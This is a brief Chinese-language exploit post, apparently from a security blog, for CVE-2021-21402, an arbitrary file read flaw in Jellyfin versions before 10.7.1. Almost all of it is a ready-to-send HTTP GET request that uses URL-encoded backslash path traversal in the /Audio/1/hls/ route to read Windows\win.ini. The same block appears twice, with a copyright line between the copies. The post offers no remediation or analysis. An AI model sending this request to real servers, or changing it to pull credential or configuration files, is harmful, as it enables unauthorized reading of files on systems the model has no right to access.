# CVE-2021-21402 Jellyfin 任意文件读取漏洞
影响版本:
– Jellyfin<10.7.1 Exp:
```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
```
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
# CVE-2021-21402 Jellyfin 任意文件读取漏洞
影响版本:
– Jellyfin<10.7.1 Exp:
```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
```
请登录后查看评论内容